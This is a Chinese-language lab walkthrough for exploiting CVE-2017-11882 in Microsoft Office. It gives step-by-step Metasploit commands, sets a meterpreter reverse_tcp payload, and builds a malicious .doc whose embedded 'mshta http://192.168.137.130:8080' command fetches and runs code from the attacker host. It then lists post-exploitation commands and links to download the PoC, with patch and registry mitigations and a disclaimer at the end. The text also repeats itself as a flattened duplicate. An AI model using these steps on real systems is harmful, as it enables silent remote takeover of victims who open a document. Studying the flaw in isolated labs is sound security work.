CVE-2017-11882复现及编写脚本实现自动化
字数 1426 2025-08-29 08:31:42

CVE-2017-11882漏洞复现与利用详细教程

漏洞概述

CVE-2017-11882是Microsoft Office中的一个内存破坏漏洞,于2017年11月14日由微软修复。该漏洞潜伏时间长达17年,影响几乎所有主流Office版本,攻击者可以利用该漏洞以当前登录用户的身份执行任意命令。

受影响版本

  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

环境准备

攻击机配置

  • 系统:Kali Linux 2017.03
  • IP地址:192.168.137.130
  • 所需工具:
    • Metasploit框架
    • CVE-2017-11882.rb漏洞利用模块
    • CVE-2017-11882.py漏洞利用脚本

靶机配置

  • 系统:Windows 7
  • 软件:Office 2016(可从MSDN下载)
    • 下载链接:ed2k://|file|cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/

漏洞利用步骤

1. 获取POC代码

  • POC代码下载链接:https://pan.baidu.com/s/1jeiN1pm78Jh-sMS3gmlXyg 提取码:m6gjo
  • rb文件下载链接:https://pan.baidu.com/s/15nURrik3Sk5FXXd8Motx4w 提取码:t1hz

2. 配置Metasploit模块

  1. 将CVE-2017-11882.rb拷贝到Metasploit目录:
cp ~/Desktop/CVE-2017-11882/CVE-2017-11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
  1. 启动Metasploit并搜索模块:
msfconsole
search CVE-2017-11882
  1. 使用漏洞模块并设置参数:
use exploit/windows/smb/CVE-2017-11882
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.137.130  # 设置攻击机IP
set uripath 11882  # 设置URI路径
exploit  # 开始监听

3. 生成恶意文档

使用CVE-2017-11882.py脚本生成包含payload的Word文档:

python CVE-2017-11882.py -c "mshta http://192.168.137.130:8080" -o 11882-3.doc

4. 执行攻击

  1. 将生成的11882-3.doc文件传输到靶机
  2. 在靶机上打开该文档(不会有任何弹窗或异常提示)
  3. 在攻击机上观察会话建立情况:
sessions  # 查看已建立的会话
sessions 1  # 进入第一个会话

5. 后渗透操作

成功建立Meterpreter会话后,可执行以下操作:

sysinfo  # 查看系统信息
getuid  # 查看当前用户
screenshot  # 截取目标屏幕

漏洞修复方案

1. 官方补丁

下载并安装微软官方补丁:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

2. 注册表修复

通过修改注册表禁用漏洞模块:

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

注意:将"XX.X"替换为实际的Office版本号(如16.0)

技术要点总结

  1. 该漏洞利用Office组件中的内存破坏漏洞,无需用户交互即可执行任意代码
  2. 攻击过程隐蔽,受害者打开文档时不会有明显异常
  3. 漏洞影响范围广,几乎所有主流Office版本均受影响
  4. 利用Metasploit框架可以方便地生成恶意文档并建立反向连接
  5. 防御措施包括安装补丁或通过注册表禁用相关组件

注意事项

  1. 本教程仅用于安全研究和教育目的
  2. 在实际环境中测试前,请确保获得合法授权
  3. 建议在隔离的测试环境中进行复现
  4. 企业用户应及时安装安全补丁,防范此类攻击
CVE-2017-11882漏洞复现与利用详细教程 漏洞概述 CVE-2017-11882是Microsoft Office中的一个内存破坏漏洞,于2017年11月14日由微软修复。该漏洞潜伏时间长达17年,影响几乎所有主流Office版本,攻击者可以利用该漏洞以当前登录用户的身份执行任意命令。 受影响版本 Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016 环境准备 攻击机配置 系统:Kali Linux 2017.03 IP地址:192.168.137.130 所需工具: Metasploit框架 CVE-2017-11882.rb漏洞利用模块 CVE-2017-11882.py漏洞利用脚本 靶机配置 系统:Windows 7 软件:Office 2016(可从MSDN下载) 下载链接:ed2k://|file|cn_ office_ professional_ plus_ 2016_ x86_ x64_ dvd_ 6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/ 漏洞利用步骤 1. 获取POC代码 POC代码下载链接:https://pan.baidu.com/s/1jeiN1pm78Jh-sMS3gmlXyg 提取码:m6gjo rb文件下载链接:https://pan.baidu.com/s/15nURrik3Sk5FXXd8Motx4w 提取码:t1hz 2. 配置Metasploit模块 将CVE-2017-11882.rb拷贝到Metasploit目录: 启动Metasploit并搜索模块: 使用漏洞模块并设置参数: 3. 生成恶意文档 使用CVE-2017-11882.py脚本生成包含payload的Word文档: 4. 执行攻击 将生成的11882-3.doc文件传输到靶机 在靶机上打开该文档(不会有任何弹窗或异常提示) 在攻击机上观察会话建立情况: 5. 后渗透操作 成功建立Meterpreter会话后,可执行以下操作: 漏洞修复方案 1. 官方补丁 下载并安装微软官方补丁: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 2. 注册表修复 通过修改注册表禁用漏洞模块: 注意:将"XX.X"替换为实际的Office版本号(如16.0) 技术要点总结 该漏洞利用Office组件中的内存破坏漏洞,无需用户交互即可执行任意代码 攻击过程隐蔽,受害者打开文档时不会有明显异常 漏洞影响范围广,几乎所有主流Office版本均受影响 利用Metasploit框架可以方便地生成恶意文档并建立反向连接 防御措施包括安装补丁或通过注册表禁用相关组件 注意事项 本教程仅用于安全研究和教育目的 在实际环境中测试前,请确保获得合法授权 建议在隔离的测试环境中进行复现 企业用户应及时安装安全补丁,防范此类攻击